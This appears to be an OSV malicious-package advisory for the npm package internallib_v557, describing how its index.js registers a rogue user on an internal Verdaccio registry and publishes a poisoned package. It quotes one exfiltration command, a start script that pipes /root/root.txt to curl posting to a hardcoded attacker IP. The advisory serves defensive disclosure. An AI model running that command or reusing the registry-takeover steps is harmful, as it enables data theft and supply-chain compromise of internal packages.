MAL-2026-5678
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v557/MAL-2026-5678.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5678
- Published
- 2026-06-11T21:57:47Z
- Modified
- 2026-06-12T16:46:41.712995722Z
- Summary
- Malicious code in internallib_v557 (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (275af9596caf2b68994ca8282da7e127f8a4478e07888dbae73826328b4e41f2)
index.js implements a multi-step attack against an internal npm registry. On invocation of the exported command(), it: (1) creates a Verdaccio user
pwn99/pwn99passagainst http://0.0.0.0:4873/-/user/org.couchdb.user:pwn99 via curl PUT; (2) queries the existinguhclabs_local_checkpackage metadata; (3) writes /tmp/pwn99/.npmrc containing a base64-encoded_authfor those credentials; (4)npm publishes a maliciousuhclabs_local_check@2.0.0to http://0.0.0.0:4873/ whose package.jsonscripts.startiscat /root/root.txt | curl -s -d @- http://10.0.0.145:8888/rootflag; and (5) at every step pipes output (user-create response, version listing, publish stdout/stderr, error output) to http://10.0.0.145:8888/step{1..n} via curl. The downstream effect: any installer who later pullsuhclabs_local_checkfrom the internal registry and runs its start script will exfiltrate the contents of /root/root.txt to the hardcoded attacker IP. The attacker also leaves a persistent publishing identity on the internal registry usable for future malicious releases of internal packages. This is a self-propagating namespace-takeover attack with a hardcoded C2 beacon and attacker-controlled persistence — there is no legitimate purpose consistent with the package's stated 'internal lib' scope. - Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-005751", "import_time": "2026-06-11T22:13:50.595564058Z", "sha256": "5cfa498f80e5965de3c072803c8d6e812e75bc5a4fb031f739cbd9c181724be3", "source": "amazon-inspector", "modified_time": "2026-06-11T21:57:47Z", "versions": [ "1.0.10" ] }, { "id": "IN-MAL-2026-005771", "versions": [ "1.0.12" ], "sha256": "515c59a706648511619a76984f038231fb7a377179ffc8f223fb6c6344d8022d", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:06Z", "import_time": "2026-06-12T16:32:15.269218098Z" }, { "id": "IN-MAL-2026-005781", "versions": [ "1.0.1" ], "sha256": "8a46697983d45d227ca57159302128b0003402847d4e7978650c9e7b88eb43e8", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:16Z", "import_time": "2026-06-12T16:32:15.894391289Z" }, { "id": "IN-MAL-2026-005765", "import_time": "2026-06-12T16:32:14.897088591Z", "sha256": "8f864aa225698875afc8ce2feefef9f46feaec9532dd0ae41a752ca0ad3ffc01", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:00Z", "versions": [ "1.0.21" ] }, { "id": "IN-MAL-2026-005762", "versions": [ "1.0.19" ], "sha256": "909cc0b096213d5fabf0b417a6ceb5fee4d420f19dd0777a9dd048b92552223f", "source": "amazon-inspector", "modified_time": "2026-06-12T15:27:58Z", "import_time": "2026-06-12T16:32:14.70996645Z" }, { "id": "IN-MAL-2026-005768", "import_time": "2026-06-12T16:32:15.130829664Z", "sha256": "a1cceaa6a553e20e294688ef48cec8478cbd75242f67b74763937cd46297379e", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:02Z", "versions": [ "1.0.15" ] }, { "id": "IN-MAL-2026-005770", "versions": [ "1.0.23" ], "sha256": "24753e0f7dcb30069b7e081debea1589b8f53a03f772593cf8a39886b3b22d0d", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:03Z", "import_time": "2026-06-12T16:32:15.240809042Z" }, { "id": "IN-MAL-2026-005767", "versions": [ "1.0.16" ], "sha256": "371586c765a962078a96bb0ecec7b5000a0a9783d01cc02907284ac4088ace4f", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:02Z", "import_time": "2026-06-12T16:32:15.051860142Z" }, { "id": "IN-MAL-2026-005779", "versions": [ "1.0.3" ], "sha256": "666cbd7854858b60fbed7ef9845c93ceb4d33ccf5c810b97d16d6c0fb75bda38", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:13Z", "import_time": "2026-06-12T16:32:15.788573494Z" }, { "id": "IN-MAL-2026-005772", "versions": [ "1.0.11" ], "sha256": "6df43f4bbb1c58bc26e585f209581aa8f2b1f1ffc639e5fe5f9d61bc774eeb1c", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:07Z", "import_time": "2026-06-12T16:32:15.375254983Z" }, { "id": "IN-MAL-2026-005775", "import_time": "2026-06-12T16:32:15.585669983Z", "sha256": "ae5880951f8d5f9562e80a80d6f54af58c7129738744d6a5627548583adf9d8e", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:09Z", "versions": [ "1.0.7" ] }, { "id": "IN-MAL-2026-005769", "import_time": "2026-06-12T16:32:15.202339872Z", "sha256": "c4b860370e48fbf532c58a1ab2734c9e75662d082a59a4684b0565b08a622304", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:03Z", "versions": [ "1.0.14" ] }, { "id": "IN-MAL-2026-005776", "versions": [ "1.0.6" ], "sha256": "db9ae27bb3518e5ef3e739386892f4b856fba9a4a7aeec518ddbddd914e095d5", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:10Z", "import_time": "2026-06-12T16:32:15.62337251Z" }, { "id": "IN-MAL-2026-005777", "import_time": "2026-06-12T16:32:15.707413043Z", "sha256": "e0b0a84585b8b97bd9b36a33c21ef65c034ce41510775a2e7ac77121a892ceaa", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:11Z", "versions": [ "1.0.5" ] }, { "id": "IN-MAL-2026-005773", "versions": [ "1.0.13" ], "sha256": "e743cd648f1208ebab7ad50f02509299935d363a9d5dd69fc50f6402782732bc", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:07Z", "import_time": "2026-06-12T16:32:15.42351404Z" }, { "id": "IN-MAL-2026-005778", "versions": [ "1.0.4" ], "sha256": "f58c6e76bd6d209bf6cf13052a5000c4d721c85d16f79327b55bd6874949a893", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:12Z", "import_time": "2026-06-12T16:32:15.752300278Z" }, { "id": "IN-MAL-2026-005780", "import_time": "2026-06-12T16:32:15.864366487Z", "sha256": "0ad3524bb951bb15ff05760def59425d5040545f3aa89cd479c2fcc644eff438", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:13Z", "versions": [ "1.0.9" ] }, { "id": "IN-MAL-2026-005791", "import_time": "2026-06-12T16:32:16.618512899Z", "sha256": "12ad882400a73a732f26c29c00d2a16377841a28fbb3fa09b596bf47a4707b24", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:27Z", "versions": [ "1.0.2" ] }, { "id": "IN-MAL-2026-005763", "import_time": "2026-06-12T16:32:14.768980591Z", "sha256": "26ab651e98275ede4899e22698958e4d97a43134a0bbb0020f567971b83451e2", "source": "amazon-inspector", "modified_time": "2026-06-12T15:27:58Z", "versions": [ "1.0.22" ] }, { "id": "IN-MAL-2026-005764", "versions": [ "1.0.24" ], "sha256": "275af9596caf2b68994ca8282da7e127f8a4478e07888dbae73826328b4e41f2", "source": "amazon-inspector", "modified_time": "2026-06-12T15:27:59Z", "import_time": "2026-06-12T16:32:14.799632682Z" }, { "id": "IN-MAL-2026-005766", "import_time": "2026-06-12T16:32:14.96805996Z", "sha256": "d04f618170995d95d6e7b8a720f4ffc9d59940c8d86ddc4e412a1f579e281f2a", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:01Z", "versions": [ "1.0.18" ] }, { "id": "IN-MAL-2026-005774", "versions": [ "1.0.8" ], "sha256": "4423dbd9ea4452b6b0c4e2c663c82d811718c163228f685cc528923a7d11a089", "source": "amazon-inspector", "modified_time": "2026-06-12T15:28:08Z", "import_time": "2026-06-12T16:32:15.469642857Z" } ] }- References
-
- https://www.npmjs.com/package/internallib_v557/v/1.0.10
- https://www.npmjs.com/package/internallib_v557/v/1.0.12
- https://www.npmjs.com/package/internallib_v557/v/1.0.1
- https://www.npmjs.com/package/internallib_v557/v/1.0.21
- https://www.npmjs.com/package/internallib_v557/v/1.0.19
- https://www.npmjs.com/package/internallib_v557/v/1.0.15
- https://www.npmjs.com/package/internallib_v557/v/1.0.23
- https://www.npmjs.com/package/internallib_v557/v/1.0.16
- https://www.npmjs.com/package/internallib_v557/v/1.0.3
- https://www.npmjs.com/package/internallib_v557/v/1.0.11
- https://www.npmjs.com/package/internallib_v557/v/1.0.7
- https://www.npmjs.com/package/internallib_v557/v/1.0.14
- https://www.npmjs.com/package/internallib_v557/v/1.0.6
- https://www.npmjs.com/package/internallib_v557/v/1.0.5
- https://www.npmjs.com/package/internallib_v557/v/1.0.13
- https://www.npmjs.com/package/internallib_v557/v/1.0.4
- https://www.npmjs.com/package/internallib_v557/v/1.0.9
- https://www.npmjs.com/package/internallib_v557/v/1.0.2
- https://www.npmjs.com/package/internallib_v557/v/1.0.22
- https://www.npmjs.com/package/internallib_v557/v/1.0.24
- https://www.npmjs.com/package/internallib_v557/v/1.0.18
- https://www.npmjs.com/package/internallib_v557/v/1.0.8
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / internallib_v557
Package
- Name
- internallib_v557
- View open source insights on deps.dev
- Purl
- pkg:npm/internallib_v557
Affected versions
1.*
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.0.8
1.0.9
1.0.10
1.0.11
1.0.12
1.0.13
1.0.14
1.0.15
1.0.16
1.0.18
1.0.19
1.0.21
1.0.22
1.0.23
1.0.24
Database specific
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
indicators
{
"evidence_files": [
{
"path": "index.js",
"sha256": "c1a4eddedda9b48d93724f255d71cf4a8bf3bc3353436dd66cedc1a9d3d062c8",
"tlsh": "c321110519b720351b7a24b59b7ba416b2438d23203cfa603acf97219fc06ac40bf6fc"
}
],
"package_integrity": [
{
"filename": "internallib_v557-1.0.10.tgz",
"hashes": {
"sha512_sri": "sha512-v1A2a2iSC5rrDtawvn1b+bLMFjm43uxbd15iewsIJZUyXfC72ElqplrugXqEOF7kfSm80VGirjxc8lLBQz5oxg==",
"sha1": "fdaf438f4bda6323d60d6153ef43c51eb9930d96"
}
}
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v557/MAL-2026-5678.json"